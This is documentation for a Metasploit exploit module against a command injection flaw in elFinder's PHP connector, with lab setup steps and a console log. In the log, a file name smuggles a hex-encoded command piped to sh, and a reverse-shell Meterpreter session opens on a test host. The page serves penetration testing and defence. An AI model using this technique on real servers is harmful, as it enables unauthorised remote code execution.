## Description

  This module exploits a command injection vulnerability in elFinder
  versions prior to 2.1.48.

  The PHP connector component allows unauthenticated users to upload
  files and perform file modification operations, such as resizing and
  rotation of an image. The file name of uploaded files is not validated,
  allowing shell metacharacters.

  When performing image operations on JPEG files, the filename is passed
  to the `exiftran` utility without appropriate sanitization, causing
  shell commands in the file name to be executed, resulting in remote
  command injection as the web server user.

  The PHP connector is not enabled by default.

  The system must have `exiftran` installed and in `$PATH`.


## Vulnerable Software

  [elFinder](https://studio-42.github.io/elFinder/) is an open-source file
  manager for web, written in JavaScript using jQuery and jQuery UI.

  This module has been tested successfully on elFinder versions 2.1.47,
  2.1.20 and 2.1.16 on Ubuntu.

  Enable the PHP connector:

  ```
  mv php/connector.minimal.php-dist php/connector.minimal.php
  ```

  Install required `exiftran` utility:

  ```
  apt-get install exiftran
  ```


## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection`
  3. Do: `set rhosts <IP>`
  4. Do: `run`
  5. You should get a new session

## Options

  **TARGETURI**

  The base path to elFinder (default: `/elFinder/`)


## Scenarios

  ```
  msf > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
  msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
  rhosts => 172.16.191.253
  msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
  targeturi => /elFinder-2.1.47
  msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
  verbose => true
  msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
  [*] 172.16.191.253:80 - The target service is running, but could not be validated.
  msf exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
  
  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
  [*] Triggering vulnerability via image rotation ...
  [*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
  [*] Sending stage (38247 bytes) to 172.16.191.253
  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
  [!] Tried to delete .kPUXqhMZ.php, unknown result
  [*] No reply
  [*] Removing uploaded file ...
  [+] Deleted uploaded file
  
  meterpreter > getuid
  Server username: www-data (33)
  meterpreter > sysinfo
  Computer    : ubuntu
  OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
  Meterpreter : php/linux
  meterpreter > 
  ```

